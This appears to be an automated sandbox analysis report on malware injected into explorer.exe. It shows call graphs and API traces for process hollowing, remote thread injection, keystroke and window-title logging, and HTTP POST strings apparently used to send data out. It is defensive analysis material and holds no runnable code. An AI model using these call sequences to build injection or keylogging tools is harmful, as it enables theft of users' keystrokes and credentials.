350->352 353 8220e-82225 350->353 352->353 357 82229-82236 353->357 358 82227 353->358 357->350 359 82238-8223c 357->359 358->357 360 8223e 359->360 361 82256-8225d call 82843 359->361 362 8223e call 82815 360->362 361->340 364 82243-82250 RtlMoveMemory 362->364 364->361
                                    APIs
                                      • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                      • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                      • Part of subcall function 000827E2: lstrlen.KERNEL32(000840DA,?,00000000,00000000,00081F86,75712B62,000840DA,00000000), ref: 000827EA
                                      • Part of subcall function 000827E2: MultiByteToWideChar.KERNEL32(00000000,00000000,000840DA,00000001,00000000,00000000), ref: 000827FC
                                      • Part of subcall function 00082374: RtlZeroMemory.NTDLL(?,00000018), ref: 00082386
                                    • RtlZeroMemory.NTDLL(?,0000003C), ref: 00081FE2
                                    • wsprintfW.USER32 ref: 0008211B
                                    • wsprintfW.USER32 ref: 00082186
                                    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00082250
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                    • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                    • API String ID: 4204651544-1701262698
                                    • Opcode ID: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
                                    • Instruction ID: 255fa56fcf304d2d87e24e71b666508560c75d90a8d3bc13f7fa8d1b7e7ffd1a
                                    • Opcode Fuzzy Hash: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
                                    • Instruction Fuzzy Hash: A9A17E71609305AFD750EFA8C885A6BBBE8FF88740F10092DF9C5D7252DA74DE048B52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 366 825ad-825c9 OpenProcess 367 825cb-825da IsWow64Process 366->367 368 82600-82607 366->368 369 825dc-825ec IsWow64Process 367->369 370 825f7 367->370 371 825f9-825fa CloseHandle 369->371 372 825ee-825f5 369->372 370->371 371->368 372->371
                                    APIs
                                    • OpenProcess.KERNEL32(00000400,00000000,?,756F3E2E,?,?,microsoftedgecp.exe,00081287), ref: 000825BF
                                    • IsWow64Process.KERNEL32(000000FF,?), ref: 000825D1
                                    • IsWow64Process.KERNEL32(00000000,?), ref: 000825E4
                                    • CloseHandle.KERNEL32(00000000), ref: 000825FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Wow64$CloseHandleOpen
                                    • String ID: microsoftedgecp.exe
                                    • API String ID: 331459951-1475183003
                                    • Opcode ID: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
                                    • Instruction ID: 3f0c6239a235d8a9353f50cbffe2d8c9637570955e109b19aea4602d3b8e1d07
                                    • Opcode Fuzzy Hash: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
                                    • Instruction Fuzzy Hash: C8F03071942A18FFAB10DF949E988EE77ACFB01655B14026AF954A2140DB354F04EBA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 421 81b17-81b2c 422 81b2e 421->422 423 81b60-81b68 421->423 424 81b30-81b5e RtlMoveMemory 422->424 425 81b6a-81b6f 423->425 426 81bc3-81bcb 423->426 424->423 424->424 429 81bbe-81bc1 425->429 427 81c0b 426->427 428 81bcd-81bdf 426->428 432 81c0d-81c12 427->432 428->427 431 81be1-81bfe LdrProcessRelocationBlock 428->431 429->426 430 81b71-81b84 LoadLibraryA 429->430 434 81b8a-81b8f 430->434 435 81c15-81c17 430->435 431->427 433 81c00-81c04 431->433 433->427 436 81c06-81c09 433->436 437 81bb6-81bb9 434->437 435->432 436->427 436->431 438 81bbb 437->438 439 81b91-81b95 437->439 438->429 440 81b9c-81b9f 439->440 441 81b97-81b9a 439->441 442 81ba1-81bab GetProcAddress 440->442 441->442 442->435 443 81bad-81bb3 442->443 443->437
                                    APIs
                                    • RtlMoveMemory.NTDLL(?,?,?), ref: 00081B4E
                                    • LoadLibraryA.KERNEL32(?), ref: 00081B76
                                    • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081BA3
                                    • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081BF4
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                    • String ID:
                                    • API String ID: 3827878703-0
                                    • Opcode ID: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
                                    • Instruction ID: 31b629b9df2a73af95de90739bfef73f464a0266a5217f3dfc158e275eeba735
                                    • Opcode Fuzzy Hash: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
                                    • Instruction Fuzzy Hash: 5A31AC75700612ABCB68DF29C894BA6B7ECBF15315B14456CE8C6CB200E735E846CBA0

                                    Execution Graph

                                    Execution Coverage:8.7%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:9
                                    Total number of Limit Nodes:2
                                    execution_graph 764 e9fab 765 e9fd8 764->765 766 ea1f3 764->766 769 ea048 765->769 773 ea04d 769->773 770 ea135 LoadLibraryA 770->773 771 ea190 VirtualProtect VirtualProtect 772 ea1e8 771->772 772->772 773->770 773->771 774 e9ff8 773->774

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_000E188C 27 Function_000E1838 0->27 1 Function_000EA00A 2 Function_000E3088 14 Function_000E2E98 2->14 55 Function_000E1B70 2->55 3 Function_000E2E08 13 Function_000E2418 3->13 41 Function_000E1D50 3->41 44 Function_000E18E8 3->44 46 Function_000E1860 3->46 4 Function_000E2508 32 Function_000E25C4 4->32 42 Function_000E18D0 4->42 45 Function_000E24E0 4->45 5 Function_000E1C08 6 Function_000E1A88 7 Function_000E1508 8 Function_000E1A04 9 Function_000E1405 10 Function_000E1000 11 Function_000E2E80 12 Function_000E141D 13->27 40 Function_000E2054 13->40 13->46 14->3 14->8 25 Function_000E2CB8 14->25 39 Function_000E1DD4 14->39 54 Function_000E2BF4 14->54 57 Function_000E2B70 14->57 15 Function_000E2010 15->8 16 Function_000E9FAB 30 Function_000EA048 16->30 17 Function_000E1C28 18 Function_000E45A7 19 Function_000EB124 20 Function_000E1822 21 Function_000E3020 21->14 21->55 22 Function_000E1D20 23 Function_000E2620 24 Function_000E3220 24->5 24->17 26 Function_000E1938 24->26 24->27 29 Function_000E1BB0 24->29 48 Function_000E2860 24->48 24->55 25->22 25->27 25->46 28 Function_000E14B2 30->1 31 Function_000E41C9 49 Function_000E25FC 32->49 33 Function_000E1F40 33->27 50 Function_000E18F8 33->50 34 Function_000E4A41 35 Function_000E355C 35->24 35->27 35->35 35->55 58 Function_000E30F0 35->58 36 Function_000E1C58 37 Function_000E1254 38 Function_000E14D4 39->27 40->0 40->15 40->26 40->27 40->33 40->42 40->46 40->50 56 Function_000E1E70 40->56 41->27 43 Function_000E156C 46->55 47 Function_000E1560 48->23 53 Function_000E2774 48->53 48->55 51 Function_000E14F9 52 Function_000E1576 57->8 57->27 58->4 58->6 58->27 58->36 58->46

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 118 e355c-e356c call e1b70 121 e35fc-e3601 118->121 122 e3572-e35a5 call e1838 118->122 126 e35a7 call e1838 122->126 127 e35d1-e35f6 NtUnmapViewOfSection 122->127 129 e35ac-e35c5 126->129 131 e3608-e3617 call e3220 127->131 132 e35f8-e35fa 127->132 129->127 137 e3619-e361c call e355c 131->137 138 e3621-e362a 131->138 132->121 133 e3602-e3607 call e30f0 132->133 133->131 137->138
                                    APIs
                                    • NtUnmapViewOfSection.NTDLL ref: 000E35D8
                                    Memory Dump Source
                                    • Source File: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_25_2_e1000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SectionUnmapView
                                    • String ID:
                                    • API String ID: 498011366-0
                                    • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                    • Instruction ID: 35eb1cebd07adc1b18c6b69b15e046bd059cdd6563af234ede06875f38d9c43f
                                    • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                    • Instruction Fuzzy Hash: 9B119430715E495FEB5CBBB9989D2B93BE0EB54301F54412AA419D76A2DE398A40C701

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 e3220-e325b call e1838 3 e3261-e3273 CreateToolhelp32Snapshot 0->3 4 e3549-e3554 SleepEx 3->4 5 e3279-e328f Process32First 3->5 4->3 6 e3538-e353a 5->6 7 e3294-e32ac lstrcmpi 6->7 8 e3540-e3543 CloseHandle 6->8 9 e348c-e3495 call e1bb0 7->9 10 e32b2-e32c6 7->10 8->4 14 e352a-e3532 Process32Next 9->14 15 e349b-e34a4 call e1c08 9->15 10->9 16 e32cc-e32e0 10->16 14->6 15->14 20 e34aa-e34b1 call e1c28 15->20 16->9 21 e32e6-e32fa 16->21 20->14 25 e34b3-e34c1 call e1b70 20->25 21->9 26 e3300-e3314 21->26 25->14 31 e34c3-e3525 call e1938 call e2860 call e1938 25->31 26->9 30 e331a-e332e 26->30 30->9 34 e3334-e3348 30->34 31->14 34->9 40 e334e-e3362 34->40 40->9 43 e3368-e337c 40->43 43->9 45 e3382-e3396 43->45 45->9 47 e339c-e33b0 45->47 47->9 49 e33b6-e33ca 47->49 49->9 51 e33d0-e33e4 49->51 51->9 53 e33ea-e33fe 51->53 53->9 55 e3404-e3418 53->55 55->9 57 e341a-e342e 55->57 57->9 59 e3430-e3444 57->59 59->9 61 e3446-e345a 59->61 61->9 63 e345c-e3470 61->63 63->9 65 e3472-e3486 63->65 65->9 65->14
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_25_2_e1000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32lstrcmpi
                                    • String ID:
                                    • API String ID: 1122579583-0
                                    • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                    • Instruction ID: 3c1d8b55e3ff178904e20a1481308595a5ff600b8310a3f59a15f7a6f8feadba
                                    • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                    • Instruction Fuzzy Hash: 3E813131218A488FE75AEF55EC58FEBB7E1FB50740F54461AA442D71A0EF78EA04CB81

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 67 ea048-ea04b 68 ea055-ea059 67->68 69 ea05b-ea063 68->69 70 ea065 68->70 69->70 71 ea04d-ea053 70->71 72 ea067 70->72 71->68 73 ea06a-ea071 72->73 75 ea07d 73->75 76 ea073-ea07b 73->76 75->73 77 ea07f-ea082 75->77 76->75 78 ea097-ea0a4 77->78 79 ea084-ea092 77->79 89 ea0be-ea0cc call ea00a 78->89 90 ea0a6-ea0a8 78->90 80 ea0ce-ea0e9 79->80 81 ea094-ea095 79->81 83 ea11a-ea11d 80->83 81->78 84 ea11f-ea120 83->84 85 ea122-ea129 83->85 87 ea101-ea105 84->87 88 ea12f-ea133 85->88 91 ea0eb-ea0ee 87->91 92 ea107-ea10a 87->92 93 ea135-ea14e LoadLibraryA 88->93 94 ea190-ea1e4 VirtualProtect * 2 88->94 89->68 96 ea0ab-ea0b2 90->96 91->85 95 ea0f0 91->95 92->85 97 ea10c-ea110 92->97 100 ea14f-ea156 93->100 98 ea1e8-ea1ed 94->98 101 ea0f1-ea0f5 95->101 113 ea0bc 96->113 114 ea0b4-ea0ba 96->114 97->101 102 ea112-ea119 97->102 98->98 103 ea1ef-ea1fe 98->103 100->88 105 ea158 100->105 101->87 106 ea0f7-ea0f9 101->106 102->83 109 ea15a-ea162 105->109 110 ea164-ea16c 105->110 106->87 112 ea0fb-ea0ff 106->112 111 ea16e-ea17a 109->111 110->111 116 ea17c-ea183 111->116 117 ea185-ea18f 111->117 112->87 112->92 113->89 113->96 114->113 116->100
                                    APIs
                                    • LoadLibraryA.KERNEL32 ref: 000EA147
                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 000EA1BB
                                    • VirtualProtect.KERNELBASE ref: 000EA1D9
                                    Memory Dump Source
                                    • Source File: 00000019.00000002.605299369.00000000000E7000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_25_2_e7000_explorer.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$LibraryLoad
                                    • String ID:
                                    • API String ID: 895956442-0
                                    • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                    • Instruction ID: 1942967e0a7e8a8ee5ce9eacee8d3334c4da41f6bf0ae595b40eab4127ce933e
                                    • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                    • Instruction Fuzzy Hash: DF51993135899D0ECB34AA399CC47B9B7C1E75F321F18066AC08AD3285D919F8868383

                                    Execution Graph

                                    Execution Coverage:14.9%
                                    Dynamic/Decrypted Code Coverage:97.6%
                                    Signature Coverage:18.6%
                                    Total number of Nodes:328
                                    Total number of Limit Nodes:7
                                    execution_graph 770 c29bd VirtualAlloc 1023 c182d 1024 c1838 RtlEnterCriticalSection lstrlenW 1023->1024 1025 c18a8 RtlLeaveCriticalSection Sleep 1024->1025 1029 c1854 1024->1029 1025->1024 1028 c29eb VirtualQuery GetProcessHeap HeapFree 1028->1029 1029->1025 1029->1028 1032 c25a4 1029->1032 1038 c200d 1029->1038 1049 c29ae VirtualFree 1029->1049 1050 c2a09 GetProcessHeap RtlAllocateHeap 1029->1050 1033 c25e8 1032->1033 1034 c25b9 CryptBinaryToStringA 1032->1034 1033->1029 1034->1033 1035 c25cc 1034->1035 1051 c2a09 GetProcessHeap RtlAllocateHeap 1035->1051 1037 c25d7 CryptBinaryToStringA 1037->1033 1039 c2030 1038->1039 1040 c2023 lstrlen 1038->1040 1052 c2a09 GetProcessHeap RtlAllocateHeap 1039->1052 1040->1039 1042 c2038 lstrcat 1043 c206d lstrcat 1042->1043 1044 c2074 1042->1044 1043->1044 1053 c20a1 1044->1053 1047 c29eb 3 API calls 1048 c2097 1047->1048 1048->1029 1049->1029 1050->1029 1051->1037 1052->1042 1087 c240f 1053->1087 1057 c20ce 1092 c298a lstrlen MultiByteToWideChar 1057->1092 1059 c20dd 1093 c24cc RtlZeroMemory 1059->1093 1062 c23f1 1064 c29eb 3 API calls 1062->1064 1063 c212f RtlZeroMemory 1065 c2164 1063->1065 1066 c2084 1064->1066 1065->1062 1067 c2192 1065->1067 1095 c243d 1065->1095 1066->1047 1069 c23d7 1067->1069 1104 c2a09 GetProcessHeap RtlAllocateHeap 1067->1104 1069->1062 1070 c29eb 3 API calls 1069->1070 1070->1062 1072 c2262 wsprintfW 1073 c2288 1072->1073 1077 c22f5 1073->1077 1105 c2a09 GetProcessHeap RtlAllocateHeap 1073->1105 1075 c22c2 wsprintfW 1075->1077 1076 c23b4 1078 c29eb 3 API calls 1076->1078 1077->1076 1106 c2a09 GetProcessHeap RtlAllocateHeap 1077->1106 1079 c23c8 1078->1079 1079->1069 1081 c29eb 3 API calls 1079->1081 1081->1069 1082 c23ad 1085 c29eb 3 API calls 1082->1085 1083 c2340 1083->1082 1107 c29bd VirtualAlloc 1083->1107 1085->1076 1086 c239a RtlMoveMemory 1086->1082 1088 c20c0 1087->1088 1089 c2419 1087->1089 1091 c2a09 GetProcessHeap RtlAllocateHeap 1088->1091 1090 c2841 2 API calls 1089->1090 1090->1088 1091->1057 1092->1059 1094 c20ed 1093->1094 1094->1062 1094->1063 1097 c244a 1095->1097 1098 c24ab 1095->1098 1096 c244e DnsQuery_W 1096->1097 1097->1096 1097->1098 1099 c248d DnsFree inet_ntoa 1097->1099 1098->1067 1099->1097 1100 c24ad 1099->1100 1108 c2a09 GetProcessHeap RtlAllocateHeap 1100->1108 1102 c24b7 1109 c298a lstrlen MultiByteToWideChar 1102->1109 1104->1072 1105->1075 1106->1083 1107->1086 1108->1102 1109->1098 771 c29ae VirtualFree 1110 c162b 1111 c163c 1110->1111 1116 c16aa 1110->1116 1112 c164b GetKeyboardState 1111->1112 1111->1116 1113 c165c ToUnicode 1112->1113 1112->1116 1114 c1684 1113->1114 1114->1116 1117 c16b9 RtlEnterCriticalSection 1114->1117 1118 c17ce RtlLeaveCriticalSection 1117->1118 1119 c16d2 lstrlenW 1117->1119 1118->1116 1120 c17bd 1119->1120 1121 c16ed lstrlenW 1119->1121 1120->1118 1122 c1702 1121->1122 1123 c174e GetForegroundWindow 1122->1123 1124 c1723 1122->1124 1123->1120 1125 c175a GetWindowTextW 1123->1125 1124->1120 1136 c17dc 1124->1136 1127 c177a lstrcmpW 1125->1127 1128 c1771 GetClassNameW 1125->1128 1130 c17bf lstrcatW 1127->1130 1131 c178b lstrcpyW 1127->1131 1128->1127 1129 c172f wsprintfW 1133 c17b6 1129->1133 1130->1120 1132 c17dc 4 API calls 1131->1132 1134 c1798 wsprintfW 1132->1134 1135 c29eb 3 API calls 1133->1135 1134->1133 1135->1120 1139 c2a09 GetProcessHeap RtlAllocateHeap 1136->1139 1138 c17ed GetLocalTime wsprintfW 1138->1129 1139->1138 772 c9ae0 773 c9ca4 772->773 774 c9aeb 772->774 773->773 775 c9bfa LoadLibraryA 774->775 778 c9c3f VirtualProtect VirtualProtect 774->778 776 c9c11 775->776 776->774 779 c9c23 GetProcAddress 776->779 778->773 779->776 780 c9c39 779->780 781 c1000 782 c1007 781->782 783 c1010 781->783 785 c1016 782->785 827 c2724 VirtualQuery 785->827 788 c1098 788->783 790 c102c RtlMoveMemory 791 c104d 790->791 792 c1072 NtUnmapViewOfSection GetCurrentProcessId 790->792 857 c2a09 GetProcessHeap RtlAllocateHeap 791->857 794 c109f 792->794 795 c1093 792->795 830 c10a5 794->830 795->788 796 c1096 795->796 858 c13ae RtlZeroMemory VirtualQuery 796->858 798 c1053 RtlMoveMemory 798->792 799 c10a4 801 c2a09 GetProcessHeap RtlAllocateHeap 799->801 802 c10bf 801->802 803 c2a09 GetProcessHeap RtlAllocateHeap 802->803 804 c10cc wsprintfA 803->804 809 c10f3 804->809 805 c276d OpenFileMappingA MapViewOfFile 805->809 806 c129a Sleep 806->809 807 c2841 lstrlen lstrlen 807->809 808 c275a UnmapViewOfFile CloseHandle 808->806 809->805 809->806 809->807 810 c2a09 GetProcessHeap RtlAllocateHeap 809->810 816 c1285 809->816 811 c1150 RtlMoveMemory CreateToolhelp32Snapshot 810->811 812 c1171 Process32First 811->812 811->816 814 c118d 812->814 815 c127e CloseHandle 812->815 813 c29eb VirtualQuery GetProcessHeap HeapFree 813->816 817 c1190 CharLowerA 814->817 815->816 816->808 816->813 818 c11ab lstrcmpi 817->818 819 c1266 Process32Next 817->819 818->819 820 c11c3 818->820 819->817 819->820 820->815 820->819 821 c12ae 16 API calls 820->821 826 c11d6 820->826 821->820 822 c26c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 822->826 823 c2724 VirtualQuery 823->826 824 c1208 lstrcmpi 824->826 825 c18bf 30 API calls 825->826 826->819 826->822 826->823 826->824 826->825 828 c101e 827->828 828->788 829 c2a09 GetProcessHeap RtlAllocateHeap 828->829 829->790 887 c2a09 GetProcessHeap RtlAllocateHeap 830->887 832 c10bf 888 c2a09 GetProcessHeap RtlAllocateHeap 832->888 834 c10cc wsprintfA 839 c10f3 834->839 836 c129a Sleep 836->839 837 c2841 lstrlen lstrlen 837->839 839->836 839->837 842 c1285 839->842 889 c276d OpenFileMappingA 839->889 892 c2a09 GetProcessHeap RtlAllocateHeap 839->892 841 c1150 RtlMoveMemory CreateToolhelp32Snapshot 841->842 843 c1171 Process32First 841->843 949 c29eb 842->949 954 c275a UnmapViewOfFile CloseHandle 842->954 845 c118d 843->845 846 c127e CloseHandle 843->846 847 c1190 CharLowerA 845->847 846->842 848 c11ab lstrcmpi 847->848 849 c1266 Process32Next 847->849 848->849 850 c11c3 848->850 849->847 849->850 850->846 850->849 853 c11d6 850->853 893 c12ae 850->893 853->849 854 c2724 VirtualQuery 853->854 855 c1208 lstrcmpi 853->855 912 c26c9 OpenProcess 853->912 918 c18bf 853->918 854->853 855->853 857->798 859 c13e4 858->859 979 c2a09 GetProcessHeap RtlAllocateHeap 859->979 861 c1402 GetModuleFileNameA 980 c2a09 GetProcessHeap RtlAllocateHeap 861->980 863 c1418 GetCurrentProcessId wsprintfA 981 c2799 CryptAcquireContextA 863->981 866 c145f RtlInitializeCriticalSection 986 c2a09 GetProcessHeap RtlAllocateHeap 866->986 867 c151b 868 c29eb 3 API calls 867->868 870 c1522 868->870 872 c29eb 3 API calls 870->872 871 c147f Sleep 987 c25f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 871->987 874 c1529 RtlExitUserThread 872->874 884 c1533 874->884 875 c1496 GetModuleHandleA GetProcAddress 876 c14b5 875->876 877 c14c6 GetModuleHandleA GetProcAddress 875->877 995 c1f3a 876->995 878 c14d9 877->878 879 c14ea GetModuleHandleA 877->879 881 c1f3a 3 API calls 878->881 1005 c1e89 879->1005 881->879 884->794 885 c25f1 10 API calls 886 c1501 CreateThread CloseHandle 885->886 886->867 887->832 888->834 890 c2794 889->890 891 c2781 MapViewOfFile 889->891 890->839 891->890 892->841 894 c12c5 893->894 907 c13a4 893->907 894->907 955 c29bd VirtualAlloc 894->955 896 c12d9 lstrlen 956 c2a09 GetProcessHeap RtlAllocateHeap 896->956 899 c29eb 3 API calls 901 c1375 899->901 909 c1388 PathMatchSpecA 901->909 911 c1399 901->911 902 c1329 RtlMoveMemory 959 c2569 902->959 903 c1353 RtlMoveMemory 906 c2569 2 API calls 903->906 910 c1351 906->910 907->850 908 c12f0 908->910 957 c2841 lstrlen lstrlen 908->957 909->901 909->911 910->899 963 c29ae VirtualFree 911->963 913 c271c 912->913 914 c26e7 IsWow64Process 912->914 913->853 915 c26f8 IsWow64Process 914->915 916 c270a 914->916 915->916 917 c2715 CloseHandle 915->917 916->917 917->913 919 c2724 VirtualQuery 918->919 920 c18d9 919->920 921 c18eb OpenProcess 920->921 922 c1b1c 920->922 921->922 923 c1904 921->923 922->853 924 c2724 VirtualQuery 923->924 925 c190b 924->925 925->922 926 c1919 NtSetInformationProcess 925->926 927 c1935 925->927 926->927 964 c1b26 927->964 930 c1b26 2 API calls 931 c197c 930->931 932 c1b19 CloseHandle 931->932 933 c1b26 2 API calls 931->933 932->922 934 c19a6 933->934 970 c1bbd 934->970 937 c1b26 2 API calls 938 c19d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 937->938 939 c1af4 CreateRemoteThread 938->939 943 c1a2b 938->943 940 c1b0b CloseHandle 939->940 942 c1b0d CloseHandle CloseHandle 940->942 941 c1a31 CreateMutexA GetLastError 941->943 944 c1a4d CloseHandle Sleep 941->944 942->932 943->941 945 c1a61 GetModuleHandleA GetProcAddress ReadProcessMemory 943->945 944->941 946 c1aed 945->946 947 c1a92 WriteProcessMemory 945->947 946->940 946->942 947->946 948 c1abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 947->948 948->946 950 c2724 VirtualQuery 949->950 951 c29f3 950->951 952 c2a07 951->952 953 c29f7 GetProcessHeap HeapFree 951->953 952->842 953->952 954->836 955->896 956->908 958 c130c RtlZeroMemory 957->958 958->902 958->903 960 c25a1 959->960 962 c2577 lstrlen RtlMoveMemory 959->962 960->908 962->960 963->907 965 c1b3a 964->965 966 c195a 964->966 967 c1b4a NtCreateSection 965->967 968 c1b69 965->968 966->930 967->968 968->966 969 c1b7e NtMapViewOfSection 968->969 969->966 971 c1bd4 970->971 972 c1c06 970->972 973 c1bd6 RtlMoveMemory 971->973 974 c1c17 LoadLibraryA 972->974 977 c1c69 972->977 978 c1c47 GetProcAddress 972->978 973->972 973->973 974->972 976 c19b6 NtUnmapViewOfSection 974->976 975 c1c87 LdrProcessRelocationBlock 975->976 975->977 976->937 977->975 977->976 978->972 978->976 979->861 980->863 982 c27bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 981->982 983 c1445 CreateMutexA GetLastError 981->983 984 c2805 wsprintfA 982->984 983->866 983->867 984->984 985 c2827 CryptDestroyHash CryptReleaseContext 984->985 985->983 986->871 988 c2631 987->988 989 c2681 CloseHandle 988->989 990 c2671 Thread32Next 988->990 991 c263d OpenThread 988->991 989->875 990->988 992 c2658 SuspendThread 991->992 993 c2660 ResumeThread 991->993 994 c2666 CloseHandle 992->994 993->994 994->990 996 c1f44 995->996 1004 c1fad 995->1004 996->1004 1014 c1fea VirtualProtect 996->1014 998 c1f5b 998->1004 1015 c29bd VirtualAlloc 998->1015 1000 c1f67 1001 c1f71 RtlMoveMemory 1000->1001 1002 c1f84 1000->1002 1001->1002 1016 c1fea VirtualProtect 1002->1016 1004->877 1006 c2724 VirtualQuery 1005->1006 1007 c1e93 1006->1007 1008 c14fa 1007->1008 1017 c1ed8 1007->1017 1008->885 1012 c1eba 1012->1008 1022 c1fea VirtualProtect 1012->1022 1014->998 1015->1000 1016->1004 1018 c1e9e 1017->1018 1019 c1eea 1017->1019 1018->1008 1021 c1fea VirtualProtect 1018->1021 1019->1018 1020 c1f04 lstrcmp 1019->1020 1020->1018 1020->1019 1021->1012 1022->1008 1140 c1581 1141 c158e 1140->1141 1142 c1623 1141->1142 1143 c15a7 GlobalFix 1141->1143 1143->1142 1144 c15b5 1143->1144 1145 c15e4 1144->1145 1146 c15c0 1144->1146 1161 c293e 1145->1161 1148 c15f2 1146->1148 1149 c15c5 lstrlenW 1146->1149 1150 c2724 VirtualQuery 1148->1150 1160 c2a09 GetProcessHeap RtlAllocateHeap 1149->1160 1152 c15fb 1150->1152 1154 c15ff lstrlenW 1152->1154 1155 c161b GlobalUnWire 1152->1155 1153 c15d8 lstrcatW 1153->1148 1154->1155 1156 c160a 1154->1156 1155->1142 1157 c16b9 19 API calls 1156->1157 1158 c1614 1157->1158 1159 c29eb 3 API calls 1158->1159 1159->1155 1160->1153 1162 c294d lstrlen 1161->1162 1167 c2982 1161->1167 1168 c2a09 GetProcessHeap RtlAllocateHeap 1162->1168 1164 c2963 MultiByteToWideChar 1165 c297b 1164->1165 1164->1167 1166 c29eb 3 API calls 1165->1166 1166->1167 1167->1148 1168->1164

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_000C200D 5 Function_000C2A09 0->5 23 Function_000C20A1 0->23 45 Function_000C29EB 0->45 1 Function_000C288D 2 Function_000C268F 3 Function_000C240F 36 Function_000C2841 3->36 4 Function_000C1E89 17 Function_000C2724 4->17 39 Function_000C1ED8 4->39 44 Function_000C1FEA 4->44 6 Function_000C298A 7 Function_000C1000 10 Function_000C1016 7->10 8 Function_000C1581 8->5 8->17 27 Function_000C293E 8->27 30 Function_000C16B9 8->30 8->45 9 Function_000C2799 10->1 10->2 10->5 13 Function_000C12AE 10->13 14 Function_000C26AE 10->14 15 Function_000C13AE 10->15 10->17 19 Function_000C10A5 10->19 28 Function_000C18BF 10->28 35 Function_000C26C9 10->35 10->36 40 Function_000C275A 10->40 41 Function_000C276D 10->41 10->45 11 Function_000C182D 11->0 11->5 12 Function_000C29AE 11->12 18 Function_000C25A4 11->18 11->45 13->5 13->12 24 Function_000C29BD 13->24 13->36 37 Function_000C255C 13->37 42 Function_000C2569 13->42 13->45 15->4 15->5 15->9 31 Function_000C1F3A 15->31 15->45 48 Function_000C25F1 15->48 16 Function_000C162B 16->30 18->5 19->1 19->2 19->5 19->13 19->14 19->17 19->28 19->35 19->36 19->40 19->41 19->45 20 Function_000C1E26 29 Function_000C1CBF 20->29 21 Function_000C1B26 22 Function_000C3627 23->1 23->3 23->5 23->6 23->24 26 Function_000C243D 23->26 34 Function_000C24CC 23->34 23->45 25 Function_000C1BBD 26->5 26->6 27->5 27->45 28->17 28->21 28->25 38 Function_000C17DC 30->38 30->45 31->24 32 Function_000C1FB4 31->32 31->44 46 Function_000C1E66 31->46 32->20 33 Function_000C1533 38->5 43 Function_000C29E9 45->17 46->29 47 Function_000C9AE0

                                    Control-flow Graph

